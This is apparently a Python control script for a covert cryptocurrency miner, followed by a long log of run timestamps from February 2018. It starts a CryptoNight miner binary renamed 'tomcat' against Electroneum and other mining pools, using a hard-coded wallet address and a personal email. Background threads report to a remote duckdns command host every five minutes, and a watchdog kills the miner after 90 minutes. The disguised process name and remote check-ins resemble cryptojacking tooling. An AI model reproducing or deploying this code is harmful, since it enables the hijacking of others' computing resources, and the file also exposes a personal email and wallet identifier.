import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:21:06.704870
#2018-02-17 16:08:06.538845
#2018-02-17 17:57:06.186440
#2018-02-17 19:45:04.232917
#2018-02-17 21:32:07.452649
#2018-02-17 23:17:03.862230
#2018-02-18 01:04:06.072451
#2018-02-18 02:52:05.943280
#2018-02-18 04:40:07.991918
#2018-02-18 06:32:07.738698
#2018-02-18 08:20:06.334737
#2018-02-18 10:08:04.232220
#2018-02-18 11:54:05.195410
#2018-02-18 13:39:05.292036
#2018-02-18 15:29:05.725351
#2018-02-18 17:17:07.467696
#2018-02-18 19:04:06.834874
#2018-02-18 20:51:03.819160
#2018-02-18 22:38:05.532163
#2018-02-19 00:27:03.578448
#2018-02-19 02:12:07.080129
#2018-02-19 03:59:04.225725
#2018-02-19 05:44:08.247900
#2018-02-19 07:32:06.883967
#2018-02-19 09:22:08.391779
#2018-02-19 11:11:06.150501
#2018-02-19 12:57:10.453946
#2018-02-19 14:46:06.199510
#2018-02-19 16:35:08.820226
#2018-02-19 18:23:09.789571
#2018-02-19 20:08:05.235849
#2018-02-19 21:57:05.496677
#2018-02-19 23:42:06.953535
#2018-02-20 01:29:06.978226
#2018-02-20 03:18:07.788853
#2018-02-20 05:04:05.373988
#2018-02-20 06:47:05.250727
#2018-02-20 08:34:04.634306
#2018-02-20 10:18:06.677205
#2018-02-20 12:03:03.975146
#2018-02-20 13:49:04.606917
#2018-02-20 15:36:05.058646
#2018-02-20 17:21:01.659653
#2018-02-20 19:12:03.156898
#2018-02-20 21:00:09.362077
#2018-02-20 22:45:07.360945
#2018-02-21 00:29:03.963718
#2018-02-21 02:16:05.287329
#2018-02-21 04:03:04.875329
#2018-02-21 05:50:05.794860
#2018-02-21 07:37:05.636586
#2018-02-21 09:21:08.558687
#2018-02-21 11:11:02.158896
#2018-02-21 12:57:10.667292
#2018-02-21 14:45:08.029531
#2018-02-21 16:32:10.294270
#2018-02-21 18:21:08.911931
#2018-02-21 20:08:01.385912
#2018-02-21 21:55:01.391931
#2018-02-21 23:43:06.186965
#2018-02-22 01:32:07.025834
#2018-02-22 03:19:06.609925
#2018-02-22 05:06:07.378316
#2018-02-22 06:49:07.375231
#2018-02-22 08:38:07.009747
#2018-02-22 10:25:05.412456
#2018-02-22 12:11:01.339429
#2018-02-22 13:56:09.037931
#2018-02-22 15:43:09.512390
#2018-02-22 17:29:02.127287
#2018-02-22 19:16:02.203407
#2018-02-22 21:07:08.231576
#2018-02-22 22:51:07.520719
#2018-02-23 00:38:06.987700
#2018-02-23 02:24:07.368814
#2018-02-23 04:14:08.104233
#2018-02-23 06:01:06.567601
#2018-02-23 07:31:04.838037
#2018-02-23 09:31:04.311039
#2018-02-23 11:17:10.013826
#2018-02-23 12:35:10.424321
#2018-02-23 14:02:07.363738
#2018-02-23 15:38:08.223563
#2018-02-23 17:11:01.959013
#2018-02-23 18:58:07.502586
#2018-02-23 20:34:05.411187
#2018-02-23 22:09:01.481273
#2018-02-23 23:44:01.581033
#2018-02-24 01:21:01.279506
#2018-02-24 02:56:03.986628
#2018-02-24 04:34:03.914791
#2018-02-24 06:03:04.792418
#2018-02-24 07:39:01.829004
#2018-02-24 09:13:01.591547
#2018-02-24 10:37:07.306504
#2018-02-24 12:23:05.057115
#2018-02-24 14:16:01.935873
#2018-02-24 16:02:01.525493
#2018-02-24 17:54:03.864289
#2018-02-24 19:41:03.623955
#2018-02-24 21:28:02.095481
#2018-02-25 00:13:01.945624
#2018-02-25 04:25:07.299694
#2018-02-25 08:06:08.185687